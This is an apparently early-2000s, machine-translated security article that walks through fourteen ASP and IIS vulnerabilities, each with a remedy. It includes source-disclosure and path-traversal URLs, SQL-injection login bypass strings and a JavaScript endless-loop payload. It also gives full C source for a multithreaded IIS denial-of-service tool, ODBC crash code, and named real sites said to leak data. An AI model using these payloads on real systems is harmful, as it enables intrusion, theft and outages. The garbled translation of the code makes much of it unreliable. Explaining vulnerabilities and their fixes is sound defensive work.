ASP Vulnerability Analysis and Solution

1. Add a special symbol after the ASP program to see the ASP source program.
Affected Versions:
Win95 + PWS
Iis3.0
98 + pws4 does not have this vulnerability.
This vulnerability does not exist in iis4.0 or later versions.
Problem description:
These special symbols include the decimal point, % 81,: $ data. For example:
Http: // someurl/somepage. asp.
Http: // someurl/somepage. asp % 81
Http: // someurl/somepage. asp: $ data
Http: // someurl/somepage. asp % 2e
Http: // someurl/somepage % 2e % 41sp
Http: // someurl/somepage % 2e % ASP
Http: // someurl/somepage. asp % 2e
Http: // someurl/MSADC/samples/selector/Showcode. asp? Source =/MSADC/samples/.../../boot. ini (you can see the content of the boot. ini file)
The source program of somepage. asp is easy to see during the browsing of iis3.0 and Win95 + PWS installed. What is the cause of this terrible vulnerability?
The root cause is that the file system exclusive to Windows NT is playing a strange role. People with a little knowledge know that NT provides a file system completely different from fat: NTFS, a technology called the New Technology file system, which enables nt to have a high security mechanism, but it is precisely because of it that it has produced many headaches.
As you may not know, NTFS supports multiple data streams contained in a file. The main data stream that contains all the content is called "data ", therefore, it is possible to easily capture script programs in files by directly accessing the NTFS system in a browser. However, the cause is: $ data is that IIS fails to parse the file name and does not properly regulate the file name.
Solution and suggestions:
If you are a winodws NT user, install iis4.0 or iis5.0. Windows2000 does not have this problem. For Win95 users, install WIN98 and pws4.0.

2. Access mdb database download Vulnerability
Problem description:
When using access as the background database, if someone knows or guessed the path and name of the server's access database through various methods, then he can download the ACCESS database file, this is very dangerous. For example, if your Access Database book. mdb is stored in the database directory under the virtual directory, someone will enter it in the browser:
Http: // someurl/database/book. MDB
If your book. mdb database is not encrypted in advance, all the important data in book. mdb is in the hands of others.
Solution:
(1) create a complex and unconventional name for your database file name, and put it under several layers. For example, if a database stores information about books, do not set up a book. mdb, such as d34ksfslf. mdb, and then put it in. in the/kdslf/i44/studi/directory, it is difficult for hackers to obtain your access database files by means of guesses.
(2) do not write the database name in the program. Some people like to write DSN in a program, such:
Dbpath = server. mappath ("analytic dB. mdb ")
Conn. Open "driver = {Microsoft Access Driver (*. mdb)}; DBQ =" & dbpath
If you get the source program, your access database name will be displayed at a glance. Therefore, we recommend that you set the data source in ODBC and write conn. Open "shujiyuan" in the program as follows"
(3) Use Access to encode and encrypt database files. First, choose tools> Security> encryption/Decryption database, and select the database (for example, employer. MDB), and then click OK. Then, the window "Save the database encrypted and saved as: employer1.mdb" appears. Then employer. mdb will be encoded and stored as employer1.mdb ..
Note that the above actions are not to set a password for the database, but to encode the database files to prevent others from using other tools to view the contents of the database files.
Next, we encrypt the database. First, we open the encoded employer1.mdb, and select the "exclusive" mode when opening it. Choose tools> Security> set database password from the menu, and enter the password.
After the password is set for employer1.mdb, if the accees database file is used again, access requires the password to be entered first, and the database can be started only after the authentication is correct.
However, you only need to add the PWD parameter to the open method of the connection object in ASP program. For example:
Param = "driver = {Microsoft Access Driver (*. mdb)}; Pwd = yfdsfs" Param = Param & "; DBQ =" & server. mappath ("employer1.mdb ")
Conn. Open Param
In this way, even if someone else gets the file "employer1.mdb", he cannot see the file "employer1.mdb" without a password.

3 code. asp files may leak ASP code
Problem description:
For example, in the asp1.0 routine provided by Microsoft, there is one. ASP file, used to view other files. source code of the ASP file, which is aspsamp/samples/code. ASP. If someone uploads the program to the server, and the server does not take any preventive measures, it is easy for someone else to view the program. For example:
Code. asp? Source =/directory/file. asp
However, this is an old vulnerability, and it is believed that this vulnerability will rarely occur.
The following command is relatively new: http: // someurl/iissamples/ExAir/howitworks/code. asp? /Lunwen/soushuo. asp = xxx. asp
The biggest harm is that the ASA file can be read in the above way; the database password is exposed to hackers in plaintext;
Solution or suggestion:
For the ASP program file of show ASP code that comes with IIS, delete the file or disable access to the directory.

4. FileSystemObject component tampering to download any files in the FAT partition
Problem description:
Iis3 and IIS4 ASP file operations can all be implemented through FileSystemObject, including read/write directory operations for text files, file copy and rename deletion, etc, however, this powerful feature leaves a very dangerous "backdoor ". Filesystemobjet can be used to tamper with any file on the FAT partition. Even NTFS partitions can also be damaged if permissions are not set. If you are not careful, you may suffer a "Disaster Tolerance ". Unfortunately, many webmasters only know how to run the Web server and seldom Set NTFS permissions. The default setting of NT directory permissions is terrible. Therefore, if you are a webmaster, we recommend that you pay close attention to the server settings and try to build the web directory on the NTFS partition. Do not set the everyone full control directory, even members in the Administrator group do not need full control, as long as they have read and Change permissions. You can also delete or rename the FileSystemObject component.

5. Entering standard HTML or Javascript statements will change the output result.
Problem description:
What are the results of entering standard HTML statements in the input box?
For example, in a message book, enter <font size = 10> hello! </Font>
If HTML statements are not blocked in your ASP program, the font size of "hello" is changed. Changing the font size and texture in the message book is sometimes not a bad thing, but can make the message book vivid. However, if you write an endless Javascript loop in the input box, for example, <a herf = "http: // someurl" onmouseover = "while (1) {window. close ('/')} "> major news </a>
If you move the mouse to the "super news" page, the browser will die in an endless loop.
Solution and suggestions:
When writing similar programs, you should take precautions against such operations. For example, you can write a program to judge the input of the client and shield all HTML and JavaScript statements.

6. ASP program password Verification Vulnerability
Vulnerability description:
Many websites put passwords in the database and use the following SQL statement in login verification (using ASP as an example)
SQL = "select * from user where username = '" & username & "' and pass = '" & pass &'"
At this point, you only need to construct a special user name and password based on SQL, such as: Ben 'or '1' = '1 to enter the page where you are not privileged. Let's take a look at the above statement: SQL = "select * from user where username = '" & username & "' and pass = '" & pass &'"
At this point, you only need to construct a special user name and password based on SQL, such as: Ben 'or '1' = '1
In this way, the program will become like this: SQL = "select * from username where username =" & ben' or '1' = 1 & "and pass =" & pass & "or is a logical operator, when two conditions are judged, the equation will be true if one of the conditions is true. in language, 1 represents true (true ). in this line of statements, the "and" verification of the original statement will not continue, but because "1 = 1" and "or" make the statement return true values.
In addition, we can also construct the following user names:
Username = 'A' or username <> 'A'
Pass = 'A' or pass <> 'A'
Write the following in the username box of the browser: AA 'or username <> In the 'aa Password box: AA' or pass & lt;> 'aa, note that the two strings do not exist at both ends. In this way, you can successfully cheat the system and enter.
Although the theory of the latter method is true, it is very difficult to practice it. The following two conditions must be met.
1. First, you must be able to accurately know which two fields are used in the table to store the user name and password. Only in this way can you accurately construct this offensive string. In fact, this is hard to guess.
2. The system does not check the validity of the string you entered.
Solution and suggestions:
Verify the entered content and process the number.

7. The Index Server service is installed in IIS4 or iis5, And the ASP source code is vulnerable.
Problem description:
On the Index Server Running IIS4 or iis5, enter a special character format to view the ASP source program or other page programs. This problem even exists when a system that has recently installed patches for source code or that does not have a. HTW file is added. Obtaining the source code of ASP programs and even the global. Asa file is undoubtedly a major security risk to the system. These codes usually contain the user password and ID, as well as the source path and name of the database. This is very important for attackers to collect system information and perform the next intrusion.
By constructing the following special program, you can refer to the program source code:
Http: // 202.116.26.38/null. HTW? Ciwebhitsfile =/default. asp & cirestriction = none & cihilitetype = full
In this way, only some HTML file code is returned, but when you add the parameters % 20 to ciwebhitsfile, the following is returned:
Http: // someurl/null. HTW? Ciwebhitsfile =/default. asp % 20 & cirestriction = none & cihilitetype = full
This will obtain the source code of the program.
(Note:/default. asp is calculated based on the web root. For example, a website's http: // welcome/welcome. asp
The corresponding information is:
Http: // someurl/null. HTW? Ciwebhitsfile =/welcome. asp % 20 & cirestriction = none & cihilitetype = full
)
Because the 'null. htw' file is not a real system ing file, it is just a virtual file stored in the system memory. Even if you have deleted all the real. HTW files from your system, the requests to the null. HTW file are handled by webhits. DLL by default. Therefore, IIS still receives the vulnerability threat.
Solution or suggestion:
If the functions provided by Webhits are required by the system, download the corresponding patch. If not, use the MMC management tool of IIS to remove the. HTW image file.
The patch is as follows:
Index Server 2.0:
Intel:
Http://www.microsoft.com/downloads/release.asp? Releaseid = 17727
ALPHA:
Http://www.microsoft.com/downloads/release.asp? Releaseid = 17728
Indexing Services for Windows 2000:
Intel:
Http://www.microsoft.com/downloads/release.asp? Releaseid = 17726

8. Access the ASP page without authentication.
Vulnerability description:
If the user knows the path and file name of an ASP page, and the file must be verified, but the user directly enters the file name of the ASP page, it is possible to bypass verification. for example, I tried this on some websites: First, close all browsers, and enter: http: // someurl/system_search.asp? Page = 1
The page is displayed only by the system staff. Of course, some people will add a judgment at the beginning of system_search.asp to prevent this situation, for example:
Determine the session ("system_name"). If it is not empty, the system will be able to enter. In this way, the above URL request will not be able to directly enter the Administrator page. However, this method also has a vulnerability. If an attacker first uses a valid account or generates a session on the local machine, such as Session ("system_name") = "admi ", because the session ("system_name") is not empty, you can directly access the Administrator page by bypassing the password.
Solution:
Perform corresponding processing at the beginning of the ASP page to be verified. For example, you can track the file name of the previous page. Only sessions transferred from the previous page can read this page.

9. Remote DoS attacks on URL requests in iis4.0/5.0 Special Data Format
Vulnerability description:
When you request a URL with a special data format on the Web service installed with iis4.0 or iis5.0, the response speed of the attacked web server may be slowed down temporarily.
Affected Versions:
Microsoftinternetinformationserver4.0
Microsoftinternetinformationserver5.0
The vulnerability test procedure is as follows:
Http: // 202.96.168.51/download/exploits/iisdos.exe
The source code is as follows:
Http: // 202.96.168.51/download/exploits/iisdos.zip
Test procedure:
You only need to enter: iisdos <***. ***> to attack the other's Web server.
Solution:
Internetinformationserver4.0:
Http://www.microsoft.com/Downloads/Release.asp? Releaseid = 20906
Internetinformationserver5.0:
Http://www.microsoft.com/Downloads/Release.asp? Releaseid = 20904
More information:
Http://www.microsoft.com/technet/security/bulletin/ms00-030.asp
Microsoft Security Bulletin MS00-021:
Http://www.microsoft.com/technet/security/bulletin/fq00-030.asp
Related connections
Http://www.ussrback.com

10. IIS Web Server DoS
Vulnerability description:
By default, IIS is vulnerable to DoS attacks. If a key named "MaxClientRequestBuffer" in the registry is not created, attacks against such NT systems usually work.
The "MaxClientRequestBuffer" key is used to set the input values allowed by IIS. If "MaxClientRequestBuffer" is set to 256 (bytes), attackers can enter a large number of characters to request IIS within 256 bytes. The default settings of the system do not limit this. Therefore, use the following program. It is easy to launch DoS attacks against IIS server:
# Include <stdio. h>
# Include <windows. h>
# Define max_thread 666
Void CNG ();
Char * server;
Char * buffer;
Int port;
Int counter = 0;
Int current_threads = 0;
Int main (INT argc, char ** argv)
{
Word tequila;
Wsadata data;
Int P;
DWORD tid;
Handle hthread [1, 2000];
// This Code is as is and sucks as it is. Won't exit correctly and a lot
Of other fun things.
// That I didn't want to take the time to do. So just Ctrl + C out of
Code.
// Load up cnghack.exe 3 times for charm.
Printf ("cng iis dos./nMarc@eEye.com/nhttp: // www.eeye.com/n/" for my
Beloved./"/N ");
If (argc <2 ){
Printf ("Usage: % s [server] [port]/n", argv [0]);
Exit (1 );
 
}
Buffer = malloc (17500 );
Memset (buffer, 'A', strlen (buffer ));
Server = argv [1];
Port = atoi (argv [2]);
Tequila = makeword (1, 1 );
Printf ("attempting to start Winsock ...");
If (wsastartup (tequila, & Data ))! = 0 ){
Printf ("failed to start Winsock./N ");
Exit (1 );
}
Else {
Printf ("started Winsock./n ");
}
Counter = 0;
For (P = 0; P <max_thread; ++ p ){
Hthread [Counter] = createthread (0,
0,
(Lpthread_start_routine) CNG,
(Void *) ++ counter,
0,
& Tid );
}
Sleep (250 );
While (current_threads)
Sleep (250 );
Counter = 0;
Printf ("terminated threads./N ");
While (counter <max_thread)
{
Terminatethread (hthread [Counter], 0 );
++ Counter;
}
Wsacleanup ();
Return 0;
}

Void CNG ()
{
Int sockfd = 0, P;
Struct sockaddr_in dstsain;
Char getkilled [] = "Get/http // R/N ";
Int die = 1;
Printf ("entered CNG/N ");
++ Current_threads;
Dstsain. sin_family = af_inet;
Dstsain. sin_port = htons (u_short) Port );
Dstsain. sin_addr.s_addr = inet_addr (server );
If (sockfd = socket (af_inet, sock_stream, 0) <0 ){
Printf ("failed to create socket/N ");
-- Current_threads;
Return;
}
If (! Connect (sockfd, (struct sockaddr *) & dstsain, sizeof (dstsain )))
{
P = Send (sockfd, getkilled, strlen (getkilled), 0 );
Printf ("Step 1: % I/N", P );
For (;;){
P = Send (sockfd, buffer, strlen (buffer), 0 );
Printf ("P: % I/N", P );
// Put in some code to check if send =-1 more then X times we drop
The loop and exit the thread
// Bla I love the dirtiness of concept code.
}
}
-- Current_threads;
Printf ("exited CNG/N ");
Return;
}

Cnghack. C works by doing the following:
Connects to example.com
Sends: Get/HTTP/[Return] [buffer]

Where:
[Return] is just an/R/n
[Buffer] is a never ending stream of A's

The attack results will cause the CPU usage of the NT System to reach 100%.
Solution
Run regedt32.exe at: HKEY_LOCAL_MACHINE/system/CurrentControlSet/services/w3svc/parameters.
Add a value:
Value Name: MaxClientRequestBuffer
Data Type: REG_DWORD
Set to decimal
Set the maximum length of URLs allowed by IIS.
Set CNNs to 256

11. DoS attacks on NT/9x due to connection overflow of the ms odbc database
Leakage description:
The Microsoft ODBC database may have a potential overflow problem when it is connected or disconnected (related to Microsoft Access database ). If you connect directly to the second database without canceling the connection, the Service may stop.
Affected System:
ODBC version: 3.510.3711.0
ODBC access driver version: 3.51.1029.00
OS Version: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386)
Microsoft Office 97 Professional (mso97.dll: 8.0.0.3507)
The vulnerability detection method is as follows:
ODBC Connection source name: miscdb
ODBC database model: MS access
ODBC hypothesis path: D:/data/Misc. MDB
The ASP code is as follows:
<%
Set connvb = server. Createobject ("ADODB. Connection ")
Connvb. Open "driver = {Microsoft Access Driver (*. mdb)}; DSN = miscdb"
%>
<HTML>
<Body>
... Lots of HTML removed...
<! -- We connect to db1 -->
<%
Set connglobal = server. Createobject ("ADODB. Connection ")
Connglobal. Open "DSN = miscdb; user = sa"
Msql = "arb SQL statement"
Set rsglobal = connglobal.exe cute (msql)
While not rsglobal. EOF
Response. Write rsglobal ("resultfrommiscdb ")
Rsglobal. movenext
Wend
'Rsglobal. Close
'Set rsglobal = nothing
'Connglobal. Close
'Set connglobal = nothing
'Note we do not close the connection
%>
<! -- Call the same database by means of DBQ direct file access -->
<%
Set connglobal = server. Createobject ("ADODB. Connection ")
Connglobal. Open "driver = {Microsoft Access Driver (*. mdb )};
DBQ = D:/data/Misc. mdb"
Msql = "arb SQL statement"
Set rsglobal = connglobal.exe cute (msql)
While not rsglobal. EOF
Response. Write rsglobal ("resultfrommiscdb ")
Rsglobal. movenext
Wend
Rsglobal. Close
Set rsglobal = nothing
Connglobal. Close
Set connglobal = nothing
'Note we do close the connection
%>
In this situation, the iisprocessing process will be suspended, and the CPU usage rate will reach 100% from the inetinfo.exe process. You can recover a computer only after it is restarted.

12. asp homepage. inc file Leakage
Vulnerability description:
Affected Versions: any system that provides ASP services
Remote: yes/local: Yes
Summary:
When the ASP homepage is being created and the final debugging is not completed, some search engines can append it as a search object. If someone uses the search engine to search for these webpages, the file is located, and the detailed location and structure of the database can be viewed in the browser to reveal the complete source code.
The procedure is as follows:
-Use the search engine to search for keywords that contain + "Microsoft VBScript run-time error execution search" + ". Inc ,"
-The search engine automatically finds and displays ASP-contained files (. Inc) to users.
-Use a browser to view the source code of the file, which may contain some sensitive information.
Vulnerability exploitation:
Example:
Http://shopping.altavista.com/inc/lib/prep.lib
Expose database connection and nature, resource location, Cookie logic, Server IP Address
Http://www.justshop.com/SFLib/ship.inc
Expose database nature
-Http://www.bbclub.com: 8013/sort des/General. inc
Expose cobranding
Http://www.salest.com/corporate/admin/include/jobs.inc
Expose datafile location and Structure
Http://www.bjsbabes.com/SFLib/design.inc
Including database structure storefront 2000 exposed source code
Http://www.ffg.com/scripts/IsSearchEngine.inc
Expose search engine Record Files
Http://www.wcastl.com/include/functions.inc
Expose member email addresses
Http://www.wcastl.com/flat/comments.txt
Expose the member's private comment File
Http://www.traveler.net/two/cookies.inc
Expose cookie Logic
Solution:
-The search engine should not index pages with ASP runtime errors
-The programmer should thoroughly debug the webpage before publishing it.
-Security experts need to fix ASP files so that external users cannot view them.
ASP news groups and sites provide two solutions to fix this vulnerability. the contents of the INC file can be encrypted. ASP file instead. the INC file prevents users from directly viewing the source code of the file from the browser .. The name of the INC file does not need to use the system default or has a special meaning that is easily guessed by the user, try to use English letters without rules.

13. You can use activer Server Explorer to read and write files.
Vulnerability description:
The activer Server Explorer of chinaasp allows you to conveniently view local files online and modify the name of the directory on the server, such as. txt,. htm,. asp,. pl,. cgi, and so on, and directly execute files on the server.
Activer Server Explorer requires a relative or absolute path. However, if an attacker uploads activer Server Explorer to a directory on the target server and supports ASP, then, you can modify and execute files on the target server through activer Server Explorer. This can happen when an attacker owns a writable directory account on the target NT Server, and the Directory supports ASP. For example, for some personal free homepage servers that support ASP, upload activer Server Explorer to the free homepage space you applied for, and then obtain the path of the target server through various methods (such as the vulnerability: "If the request does not contain an idq or IDA file extension, the physical address of the file on the server is exposed. "). or enter ". ", usually the default value. In this way, attackers can modify the file on the target server, regardless of whether the file has read/write access.
Therefore, servers that provide personal homepages or other services with ASP services must be more careful with such attacks.
Vulnerability Solution
In fact, activer Server Explorer exploits the above vulnerability 4 FileSystemObject component to tamper with the download of any files on the FAT partition.
So how can we restrict users from using FileSystemObject objects? An extreme approach is to completely unregister the component that provides the FileSystemObject object, that is, scrrun. dll. The specific method is as follows:
In the MS-DOS status, type:
Regsvr32/u c:/Windows/system/scrrun. dll
(Note: You must change the path to your local path in actual operations)
In this case, you cannot use the FileSystemObject object. Sometimes it is very convenient to use the FileSystemObject object to manage files. What can be done?
What are the best of both worlds?
We can prevent others from using the FileSystemObject object illegally, but we can still use this object ourselves.
The method is as follows:
Searching Registry
Hkey_classes_root/scripting. FileSystemObject key value
Change it to the string you want (right-click --> "RENAME"), for example, change it
Hkey_classes_root/scripting. filesystemobject2
In this way, the object must be referenced in ASP as follows:
Set FSO = Createobject ("scripting. filesystemobject2 ")
But cannot use:
Set FSO = Createobject ("scripting. FileSystemObject ")
If you use the usual method to call the FileSystemObject object, you will not be able to use it.
As long as you do not tell others the name of the modified object, others cannot use the FileSystemObject object. As a site manager, we can prevent others from illegally using the FileSystemObject object, and we can still use this object to conveniently implement online website management and other functions!

14. iis4.0/iis5.0 ultra-long file name Request Vulnerability
Vulnerability description:
Affected Versions:
Microsoft IIS 5.0
+ Microsoft Windows NT 2000
Microsoft IIS 4.0
+ Microsoft Windows NT 4.0
+ Microsoft backofficice 4.5
-Microsoft Windows NT 4.0
+ Microsoft backofficice 4.0
-Microsoft Windows NT 4.0
If 230 "% 20" is added after a known file name, Microsoft IIS 4.0/5.0 will be installed to leak the content of the file. This is caused by the. HTR File mapped by ISM. DLL. For example:
Http: // target/filename % 20 <repeated 230 times>. htr
This type of request takes effect only when the. HTR request is the first call or ISM. DLL is loaded into the memory for the first time.
Solution:
Install patches:
Microsoft IIS 5.0: